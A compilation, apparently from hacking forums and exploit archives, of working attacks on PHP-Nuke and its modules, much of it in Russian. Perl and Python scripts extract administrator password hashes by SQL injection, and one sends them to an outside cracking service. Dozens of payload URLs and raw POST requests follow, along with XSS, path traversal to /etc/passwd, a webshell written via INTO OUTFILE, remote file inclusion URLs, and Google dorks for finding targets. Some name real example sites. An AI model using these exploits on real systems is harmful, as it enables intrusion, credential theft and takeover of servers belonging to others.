#user_id name username user_email femail user_website user_avatar user_regdate user_icq user_occ user_from user_interests user_sig user_viewemail user_theme user_aim user_yim user_msnm user_password storynum umode uorder thold noscore bio ublockon ublock theme commentmax counter newsletter user_posts user_attachsig user_rank user_level broadcast popmeson user_active user_session_time user_session_page user_lastvisit user_timezone user_style user_lang user_dateformatuser_new_privmsg user_unread_privmsg user_last_privmsg user_emailtime user_allowhtml user_allowbbcode user_allowsmile user_allowavatar user_allow_pm user_allow_viewonline user_notify user_notify_pm user_popup_pm user_avatar_type user_sig_bbcode_uid user_actkey user_newpasswd last_ip user_color_gc user_color_gi user_quickreply user_allow_arcadepm kick_ban user_wordwrap agreedtos user_view_log user_effects user_privs user_custitle user_specmsg user_items user_trade points user_cash last_seen_blocker user_login_tries user_last_login_try user_gender user_birthday user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines: 44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table = "nuke_users";
$uid = 2;
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");

$a = 0;
foreach (@ARGV) {
$a++;
while (($k, $v) = each(%cm_n_)) {
if ($_ eq $k) {
${$v} = $ARGV[$a];
}
}
}
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
sub getit($$)
{
$url = shift;
$reg = shift;


$ua = LWP::UserAgent->new;
$urls = $url;
$response = $ua->get($urls);
$content = $response->content;

if ($content=~m/$reg/) {
($f,$s,$l) = split(">>",$1);
$s =~s/ Post //;
print $column.":".$s."\n";
}
}


© Inphex

Tool that demonstrates how the CAPTCHA used in PHP-Nuke version 8.1 can be deciphered with 100% accuracy.

http://packetstormsecurity.org/0804-exploits/php_nuke_captcha.zip

PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability
-------------------------------------------------------------------------------
php-nuke modules EasyContent remote sql inj
-------------------------------------------------------------------------------
found =xoron
-------------------------------------------------------------------------------
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
-------------------------------------------------------------------------------
Example: http://eurowards.org/content/

not: password and username in title! colomb number 1

not2: Adam gibi bug bulunda dolanın ortalarda, istenilince ne kadar boş bug varsa böle post edilir milw0rma.
işe yarar bug nasıl hit yapıyor görmek istiyorsanız

http://www.milw0rm.com/author/721

sadece bi bug 16000+ hit sadece milw0rm;)

Herzmn kral benimdir!
-------------------------------------------------------------------------------

PHP-Nuke GaestebuchSQL Injection Exploit
#!/usr/bin/python
# PHP-Nuke Gaestebuch Module SQL Injection Exploit
# Coded By Shahin Ramezany For Fun
# E-Mail : Admin@secuiran.com

import string
import urllib
import sys
import re

def Secuiran():
print "\n"
print "################################################## ###"
print "# WwW.Secuiran.Com #"
print "# PHP-Nuke Gaestebuch Module SQL Injection Exploit #"
print "# Coded By Shahin . Ramezany (Vampire) For Fun #"
print "# Keep It Priv8 && Never Post In Public Forum's #"
print "# E-Mail : Admin@Secuiran.com #"
print "# Gr33tz To : Syst3m_F4ult ,Shinobi ,Samir ,Xtemix #"
print "# Digilas ,Skuk ,Raptor &All Of Secuiran Member's #"
print "################################################## ###"
print "\n"




#Call Banner
Secuiran()

print "\n[+] Target Host: e.g: http://127.0.0.1/phpnuke/"
try:
host=raw_input("\nTarget Host (with http) : ")
except KeyboardInterrupt:
print "\n[-] Program Terminated"
sys.exit()

print "\n[+] Output File: e.e: secuiran.txt"

try:
secuiran=raw_input("\nOutput File: ")
except KeyboardInterrupt:
print "\n[-] Program Terminated"
sys.exit()

print "\n[+] Trying To Connect ...\n"

#SQL Injection URL
sql_inject=host+"/modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors +where+radminsuper=1"

response = urllib.urlopen(sql_inject).read()

print "[+] Trying To Inject Code ...\n"
#Extract Admin User

findall_users=re.compile('<td><input type="text" name="guestemail" size="20" maxlength="50" value="(\w+)"></td>').findall
found_users=findall_users(response)

#check found user length
if len(found_users)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()

#Extract Admin Hash
response = urllib.urlopen(sql_inject).read()
findall_hashs=re.compile('<textarea cols="50" rows="20" name="guesttext">(\w+)</textarea>').findall
found_hashs=findall_hashs(response)
if len(found_hashs)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()


#Crack The Hash
md5 = string.join( found_hashs, '' )
print "[+] Trying To Crack The Hash ..."
crack="http://tmto.org/server/proxy.php?action=search&div=result&host=MD5_1&arg="+md5
result = urllib.urlopen(crack).read()
cracked = re.compile("MD5_1_result,"+md5+" - (\w+)").findall
if re.match(result,"MD5_1_result,"+md5+" - not found"):
print "[-] Can Not Crack"
#sys.exit()

found=cracked(result)
#Convert List To String
cracked_md5 = string.join( found, '' )

#Print All Info
Secuiran()
print "\n[+] Host : ",host
for i in range(len(found_users)):
print "\n[+] Admin User : ",found_users[i]
print "\n[+] Admin Hash : ",found_hashs[i]
if (cracked_md5 == "not"):
print "\n[-] Sorry Can Not Crack Your Hash Go And Try More !!!"
else:
print "\n[+] Hash Cracked Successfully : ",cracked_md5

#Save All Info In File
file = open(secuiran, "w")
file.write("************************************************** WwW.Secuiran.Com********************************** ****************\n")
file.write("\n")
file.write("HOST :")
file.write(" ")
file.write(host)
file.write("\n")
file.write("\n")
file.write("USER HASH\n")
file.write(" ")
file.write("\n")
for i in range(len(found_users)):
file.write(found_users[i])
file.write(" ")
file.write(found_hashs[i])
file.write("\n")
file.write("\n")
if (cracked_md5 == "not"):
file.write("\n")
file.write("I Can't Crack Your Hash")
else:
file.write("Cracked :")
file.write(" ")
file.write("\n")
file.write(cracked_md5)
file.write("\n")
file.write("************************************************** WwW.Secuiran.Com********************************** ****************\n")
file.close()
print "\n[+] Successfully, Writed To ",secuiran," File ."

PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerab

#!/usr/bin/python
#================================================= ==============================
==================#
# This is a Priv8 Exploit. #
# Date: 23/02/2008 [dd,mm,yyyy] #
# #
#================================================= ==============================
==================#
# PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2 #
# Response Analisys Method #
# #
# Vendor: http://www.phpnuke.org #
# Severity: Highest #
# Author: The:Paradox #
#================================================= ==============================
==================#
# Server configuration requirments: #
# magic_quotes_gpc = 0 #
#================================================= ==============================
==================#
# Proud To Be Italian. #
#================================================= ==============================
==================#
"""
Related Codes:
mainfile.php; line 89;

if (!ini_get('register_globals')) {
@import_request_variables("GPC", "");
}
/Your_Account/index.php; line 1700;
switch($op) {
// [..]
case "activate":
activate($username, $check_num);
break;
// [..]
}
/Your_Account/index.php; line 161:

function activate($username, $check_num) {
global $db, $user_prefix, $module_name, $language, $prefix;
$username = filter($username, "nohtml", 1);
$past = time()-86400;
$db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past");
$sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'";
echo $sql;
$result = $db->sql_query($sql);

"""
#================================================= ==============================
==================#
# Proof Of Concept / Bug Explanation: #
# #
# I'm too lazy to write explanation this time. Sql injection Mq=OFF in $check_num variable. #
# Byte null bypasses all query string check. #
# #
#================================================= ==============================
==================#
# Google Dork=> Powered by PHPNuke #
#================================================= ==============================
==================#
# Use this at your own risk. You are responsible for your own deeds. #
#================================================= ==============================
==================#
# Python Exploit Starts #
#================================================= ==============================
==================#
import httplib, sys, time
print "\n#=============================================== ==========#"
print " PHPNuke <= 8.0 And Maybe Higher "
print " Blind Sql Injection Vulnerability Mq=0 "
print " Response Analisys Method "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " python %s [Target] [Path] [UsernameUnveryfied] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /Nuke/ Abdullah " % (sys.argv[0])
print " python %s www.host.com / Andrea " % (sys.argv[0])
print " "
print " "
print "#================================================= ========#\n"
if len(sys.argv)<=3: sys.exit()
else: print "[.]Exploit Starting."


target = sys.argv[1]
path = sys.argv[2]


prefix = "nuke_"
port = "80"


j=1
h4sh = ""
md5tuple = []

for k in range(48,58): md5tuple.append(k) # 48->57 and 97->102
for k in range(97,103): md5tuple.append(k)
md5tuple.append('END')

# Result query >>>
#
# SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1'
#

print "[.]Blind Sql Injection Starts.\n\nHash:"
while j <= 32:
for i in md5tuple:
if i == 'END': sys.exit('[-]Exploit Failed.\n')

conn = httplib.HTTPConnection(target,port)
conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd ," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"})

response = conn.getresponse()

time.sleep(0.5)
if response.status == 404: sys.exit('[-]Error 404. Not Found.')
if response.read().find("New user verification number is invalid.") != -1:
sys.stdout.write(chr(i))
sys.stdout.flush()
h4sh += chr(i)
j += 1
break;

print "\n\n[+]All Done.\n-=Paradoxe=-"

Ковырял я когда то PHP Nuke 8.0. Вот парачка багов:

[XSS]
http://nuke/modules.php?name=Encyclopedia&file=search&eid=1%00"><script>alert()</script>


[XSS]
http://nuke/modules.php?name=Your_Account&op=logout
POST: redirect=1%00"><script>alert()</script>


[SQL-Inj] (POC)
http://nuke/admin.php
POST: aid=d%00'%0DUNION SELECT md5(1),'&pwd=1&random_num=80237&op=login

Уязвимая версия myPHPNuke 1.8.8_8rc2

Уязвимость xss в site.ru/memberslist.php в параметрах
search, letter, sortcol, sortdir, pagesize.

тут все на украинском я мало что понял :) о регенат тут (http://websecurity.com.ua/2297/)

XSS:
POST-запрос на странице http://site/modules.php?name=Your_Account &op=new_user
"><script src=http://site/script.js>
В полях: gfx_check та random_num.

Ковырял PHP Nuke 8.0 нашел скулю, вродь не боян

Суть баги заключается в том, что в модуле News, в комментариях, данные об email при получении их из БД nuke не фильтрует и подставляет в запрос, что позволяет нам внедрить наш sql код

Exploit:

Для примера возьму сайт sat-port.info
Регистрируемся, редактируем наш аккаунт:
http://sat-port.info/modules.php?name=Your_Account&op=edituser
в поле Любой Email пишем:
admin@admin.ru',1,2,(select concat_ws(0x3a,aid,pwd) from nuke_authors limit 0,1),4,5,6,7)/*
Берем любую новость где разрешено оставлять комментарии, к примеру эту:
http://sat-port.info/modules.php?name=News&file=article&sid=554
жмем "Комментировать" и пишем комментарий любого содержания, в результате появиться комментарий содержащий логин:хэш администратора

################################################## ##########

SQL Injection vulnerability in myPHPNuke

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2398/

Description: There is SQL Injection vulnerability in printfeature.php in
myPHPNuke.

SQL Injection:

http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,n ull,null%20from%20mpn_authors%20limit%200,1

With this query you will receive login and password (hash) of administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the
additional filters were added, so it is not vulnerable to this attack. But
version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL
Injection attack is possible (without using spaces and brackets).

################################################## ##########

# milw0rm.com [2008-09-02]


Содрано с milw0rm.com/exploits/6347

изучал модуль Mediacatalog v3.1 в PHP Nuke 8.0


modules.php?name=Mediacatalog&pa=list_pag&cid=-1+union%0Aselect+aid,pwd+from+nuke_authors


и еще


modules.php?name=Mediacatalog&pa=Listcat&cidcat=-1+union%0Aselect+1,2,aid,3,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,pwd,24,25+from+nuke_auth ors--
modules.php?name=Mediacatalog&pa=Newsreliz&catnewid=-1+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,pwd,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,aid,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49+from+nuke_authors--

SQL-Injection In PHP-Nuke <= 8.0(Module Reviews)

/modules/Reviews/index.php
Фрагмент уязвимого кода:
$uname = filter($cookie[1], "nohtml");
$id = intval($id);
$score = intval($score);
if (is_user($user)) {
$krow = $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'"));
if ($krow['karma'] == 2) {
$db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')");
include("header.php");
title(""._MODERATEDTITLE."");
OpenTable();
echo "<center>"._COMMENTMODERATED."";
echo "<br><br><a href=\"modules.php?name=$module_name&rop=showcontent&id=$id\">"._MODERATEDTITLE."</a>";
CloseTable();
include("footer.php");
die();
} elseif ($krow['karma'] == 3) {
Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id");
die();
}
}
$db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')");
Тут присутствуют сразу 2 sql-inj, в select и в insert запросах, после раскадировки кук, происходит слэширование данных, но в данном фрагменте кода данные из $cookie[1] попадают в ф-цию filter
function filter($what, $strip="", $save="", $type="") {
if ($strip == "nohtml") {
$what = check_html($what, $strip);
// $what = htmlentities(trim($what), ENT_QUOTES);
// If the variable $what doesn't comes from a preview screen should be converted
if ($type != "preview" AND $save != 1) {
$what = html_entity_decode($what, ENT_QUOTES);
}
}
if ($save == 1) {
$what = check_words($what);
$what = check_html($what, $strip);
if (!get_magic_quotes_gpc()) {
$what = addslashes($what);
}
} else {
$what = stripslashes(FixQuotes($what,$strip));
$what = check_words($what);
$what = check_html($what, $strip);
}
return($what);
}
а оттуда в ф-цию check_html
function check_html ($str, $strip="") {
/* The core of this code has been lifted from phpslash */
/* which is licenced under the GPL. */
include("config.php");
if ($strip == "nohtml")
$AllowableHTML=array('');
$str = stripslashes($str);
$str = eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>', $str);
// Delete all spaces from html tags .
$str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">', $str);
// Delete all attribs from Anchor, except an href, double quoted.
$str = eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>", '', $str);
// Delete all img tags
$str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>", '', $str);
// Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com
$tmp = "";
while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) {
$i = strpos($str,$reg[0]);
$l = strlen($reg[0]);
if ($reg[1][0] == "/") $tag = strtolower(substr($reg[1],1));
else $tag = strtolower($reg[1]);
if ($a = $AllowableHTML[$tag])
if ($reg[1][0] == "/") $tag = "</$tag>";
elseif (($a == 1) || ($reg[2] == "")) $tag = "<$tag>";
else {
# Place here the double quote fix function.
$attrb_list=delQuotes($reg[2]);
// A VER
//$attrb_list = ereg_replace("&","&amp;",$attrb_list);
$tag = "<$tag" . $attrb_list . ">";
} # Attribs in tag allowed
else $tag = "";
$tmp .= substr($str,0,$i) . $tag;
$str = substr($str,$i+$l);
}
$str = $tmp . $str;
return $str;
exit;
/* Squash PHP tags unconditionally */
$str = ereg_replace("<\?","",$str);
return $str;
}где экранирующие бэкслэши успешно удаляются, поэтому становится возможным внедрить наш sql код, через скулю в select данные вывести не получится, поэтому юзаем скулю в insert
Идем в
/modules.php?name=Reviews&rop=showcontent&id=1
выбираем любую рецензию, жмем "Поместить комментарий"
в куки кидаем
base64_encode(yourid:yournick',1,(select concat(aid,0x3a,pwd) from nuke_authors),3)/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)
Жмем submit, в результате мы получим login:hash админа

Зато через скулю в select при file_priv можно залить шелл, кидаем в куки:
base64_encode(yourid:yournick' union select 0x3c3f20706870696e666f28293b203f3e into outfile '/tmp/theme.php'/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)
Тут путь можно не раскрывать, лить в tmp, а затем просто проинклудить залитый шелл через templetes, для этого идем в /modules.php?name=Your_Account&op=chgtheme
правим сурс, там где написано имя темы, в моем случае value=RusNuke2003 пишем:
<option value="/../../../../../../../tmp/" >RusNuke2003
сохраняем, получаем шелл

Уязвимый продукт: PHP-NUKE module Pages
Версия: 1.0
Дорк: Pages © inurl:/modules.php?name=Pages

SQL-injections

Уязвимость в файле: index.php

В модуле отсутствует какая-либо защита от sql-inj, поэтому не вижу смысла приводить фрагменты уязвимого кода, уязвимы все параметры

/modules.php?name=Pages&pa=list_pag&cid=-2%0aunion+select+aid,pwd+from+nuke_authors%23
/modules.php?name=Pages&pa=showpage&pid=11'%0aunion+select+1,2,aid,pwd,5,6,7,8,9,0,11, 12+from+nuke_authors%23
/modules.php?name=Pages&pa=list_pages_categories&cid=11'%0aunion+select+1,aid,pwd,4+from+nuke_autho rs%23
/modules.php?name=Pages&cid=11'%0aunion+select+1%23
/modules.php?name=Pages&pid=11'%0aunion+select%201,2%23

Уязвимый продукт: PHP-NUKE module video stream
Версия: 4.53
Дорк: inurl:name=Video_Stream

SQL-injections


Уязвимость в файле: watch.php
$id = $_GET['id'];
$request = $_GET['request'];

if($id == "request") {
// Gets the data of request video **FOR ADMIN**
$result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$request'");
$row = $db->sql_fetchrow($result);
} else {
// Check if category is adult category and requires user to accept disclaimer or if required ofr the user to be registered
adultcategory($id);
// Add user point for veiwing video
userpointsVS(1);
// adds a view to the video
$result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'");
$row = $db->sql_fetchrow($result);
$v = $row['views'];
$v++;
$result = $db->sql_query("UPDATE ".$prefix."_video_stream SET views='$v' WHERE id='$id'");
// Gets the data of that video
$result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'");
$row = $db->sql_fetchrow($result);
}
Как видим здесь присутствуют сразу несколько sql-inj
Примеры запросов:
/modules.php?name=Video_Stream&page=watch&id=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16%23
/modules.php?name=Video_Stream&page=watch&id=request&request=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16%23

Уязвимость в файле: broken.php
if($_POST['Submit']) {
OpenTable();
$usernameb = $_POST['username'];
$user_emailb = $_POST['user_email'];
$result = $db->sql_query("INSERT INTO ".$prefix."_video_stream_broken (username, email, brokenvidid) VALUES('$usernameb', '$user_emailb', '$id') ");
Пример запроса:
POST /phpnuke/modules.php?name=Video_Stream&page=broken&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=broken&id=1&vidname=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
username=',if(1=1,BENCHMARK(1559911,MD5(NOW())),1) ,1)/*&user_email=ad%40a.ru&Submit=Submit

Уязвимость в файле: search.php
В этом модуле присуствуют сразу несколько sql-inj

Примеры запросов:
1. /phpnuke/modules.php?name=Video_Stream&page=search
в поле search:
44' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16/*
2.POST /phpnuke/modules.php?name=Video_Stream&page=search HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=search
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
PHPSESSID=1960d2f98b8657b6e5bdf140c2f8c8ec&orderby=0&categoryby=31' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16%23&sortvids=Sort

Уязвимость в файле: comment.php
$commenttopost = $_POST['comment'];
// Check if no comment
if($commenttopost == "") {
die(""._NOCOMMENTENT."");
}
$date = date("h:i A dS M Y");

$username = $looker;

// Strips out HTML and Censored Words
filter_text($commenttopost, 'nohtml');
// **********************************
userpointsVS(2);
$result = $db->sql_query("INSERT INTO ".$prefix."_video_stream_comments (vidid, user, date, comment) VALUES ('$id', '$username', '$date', '$EditedMessage') ");
в куки кидаем:
id=СУЩЕСТВУЮЩИЙ_ID', 'admin', '12:02 AM 15th Dec 2008',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1))/*
В результате получим комментарий содержащий aid:hash администратора

Уязвимый продукт: PHP-NUKE module auktion
Версия: 2.0
Дорк: inurl:modules.php?name=auktion

SQL-injections

В модуле отсутствует какая-либо защита от sql-inj, уязвимости присуствуют почти во всех файлах

Примеры запросов:
/modules.php?name=auktion&file=viewitem&item=4%0aunion+select+1,2,3,4,5,6,7,8,9,0,11,12,13 ,14,15,16,17,18,19,20,21
/modules.php?name=auktion&file=catlist&catid=29'%0aunion+select+1,2,3,4,5,6,7%23
/modules.php?name=auktion&file=searchit&query='%0aunion+select+1,2,3,4,5,6,7/*
/modules.php?name=auktion&file=edititem&item=-3'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21%23

POST /modules.php?name=auktion&file=edititem HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/nuke81/modules.php?name=auktion&file=edititem&item=3
Cookie: lang=english; admin=YWRtaW46OTZlNzkyMTg5NjVlYjcyYzkyYTU0OWRkNWEz MzAxMTI6; user=MjphZG1pbjo5NmU3OTIxODk2NWViNzJjOTJhNTQ5ZGQ1Y TMzMDExMjoxMDo6MDowOjA6MDo6NDA5Ng%3D%3D;
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
name=auktion&file=update&item=3&desc=4',title=(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1)/*

Уязвимый продукт: PHP-NUKE module NukeJokes
Версия: 2.2
Дорк: inurl:modules.php?name=NukeJokes

SQL-injections

Уязвимость в файле: index.php
function CatView($cat, $page){
...
$result = sql_query("SELECT jokecid, catname FROM ".$prefix."_jokes_categories WHERE jokecid='$cat'", $dbi);
Данные из параметра cat попадают в запрос без каких либо преобразований
Пример запроса:
/modules.php?name=NukeJokes&func=CatView&cat=-7'%0aunion+select+1,2%23
function JokeView($jokeid){
...
$result = sql_query("SELECT author, name, date, cat, joke, hits, ratingtot, ratings FROM ".$prefix."_jokes WHERE jokeid='$jokeid'", $dbi);
Данные из параметра jokeid попадают в запрос без каких либо преобразований
Пример запроса:
/modules.php?name=NukeJokes&func=JokeView&jokeid=-1'%0aunion+select+1,2,3,4,5,6,7,8%23
Уязвимость в файле: send.php
function send($jokeid, $sendername, $senderemail, $toname, $toemail){
global $sitename, $nukeurl, $prefix, $dbi, $module_name, $stop;
include("header.php");
include("config.php");
checkemail($toemail);
if (!$stop) {
$result = sql_query("SELECT name from ".$prefix."_jokes where jokeid='$jokeid'", $dbi);
list($name) = sql_fetch_row($result, $dbi);
$subject = ""._SUBJECT." $sitename";
$message = ""._HELLO." $toname:\n\n"._YOURFRIEND." $sendername "._CONSIDERED."\n\n\n$name\n\n"._URL.": $nukeurl/modules.php?name=$module_name&func=JokeView&jokeid=$jokeid\n\n"._YOUCANREAD." $sitename\n$nukeurl";
$toemail = str_replace(" ","",$toemail);
mail($toemail, $subject, $message, "From: \"$sendername\" <$senderemail>\nX-Mailer: PHP/" . phpversion());
Уязвимость в параметре jokeid, т.к данные из столбца name отправляются на email, при таком запросе:
POST /modules.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/modules.php?name=NukeJokes&file=send&jokeid=1608
Cookie: TRACKID=7b45bd0b2a560da542a5eb4fc22512c6; lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
name=NukeJokes&file=send&func=send&jokeid=-1'/**/union select concat(aid,0x3a,pwd) from nuke_authors limit 0,1/*&sendername=aaa&senderemail=aaa%40mail.ru&toname=bbb&toemail=aaa%40mail.ru
Мы получим aid:hash администратора на указаное нами мыло

Уязвимость в файле: search.php
function search($q, $cat){
global $module_name, $prefix, $bgcolor1, $bgcolor2, $dbi, $prefix;
include("header.php");
if($cat==0){
$cats = " ";
}else{
$cats = " cat=".$cat." AND ";
}

ModuleSearch();
...
$search = sql_query("SELECT jokeid, author, date, name, cat, hits, ratings FROM ".$prefix."_jokes WHERE".$cats."(name LIKE '%$q%' OR joke LIKE '%$q%')", $dbi);
Уязвимость в параметрах cat и q
Пример запроса:
/modules.php?name=NukeJokes&file=search&func=search&q=x&cat=7%0aunion+select+1,2,3,4,5,6,7%23

Уязвимость в файле: comments.php
function JokesAddCom($jokeid, $author, $comment){
global $prefix, $dbi, $bgcolor1, $module_name, $bgcolor2;
$author = FixQuotes(nl2br(filter_text($author)));
$comment = FixQuotes(nl2br(filter_text($comment)));
sql_query("INSERT into ".$prefix."_jokes_comments VALUES(NULL, '$author' ,'$comment' , '$jokeid')", $dbi);
в ф-ции, filter_text удаляются хтмл тэги, затем данные попадают в ф-цию FixQuotes
function FixQuotes ($what = "") {
while (stristr($what, "\\\\'")) {
$what = str_replace("\\\\'","'",$what);
}
return $what;
}
Для чего здесь была использована эта ф-ция непонятно, при magic_quotes_gpc=off мы без труда можем внедрить наш sql код, для этого
выбираем любую шутку, жмем добавить комментарий, в куки кидаем:
author=aa',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1),Существующий_ID)/*
в результате получим aid:hash админа

В модулях:

http://site/modules.php?name=Search&type=comments&query=not123 exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
http://www.strona.pl/modules.php?name=Search&file=../../../../../../ ../../../etc/passwd%008


http://site/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../../../../etc/passwd


http://site/modules.php?name=Private_Messages&file=index&folde r=inbox&mode=read&p=1&user=eDpmb28nIFVOSU9OIFNFTEV DVCAyLG51bGwsMSwxLG51bGwvKjox


http://site/modules.php?name=Web_Links&l_op=viewlink&cid=2%20U NION%20select%20counter,%20pwd,%20aid%20FROM%20nuk e_authors%20--


http://site/modules.php?name=Reviews&rop=savecomment&id=1&amp; amp;uname=f00bar&score=999999999999999999999999


http://site/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20F ROM%2 0nuke_authors%20--


http://site/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*



В галерии:


http://site/modules/My_eGallery/public/displayCategory.php?basepath=yourshell.txt?&cmd=un ame -a;id;pwd


http://site/modules/4nAlbum/public/displayCategory.php?basepath=yourshell.txt?&cmd=un ame -a;id;pwd


http://site/modules/coppermine/upload.php?basepath=yourshell.txt?&cmd=uname%20-a;id;pwd


http://site/modules/coppermine/themes/default/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd


http://site/modules/coppermine/include/init.inc.php?CPG_M_DIR=yourshell.txt?&cmd=uname -a;id;pwd


http://site/modules/coppermine/themes/maze/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd


http://site/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd


http://site/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=yourshell.txt?&c md=uname%20-a;id

Инклуды:


http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=shell?
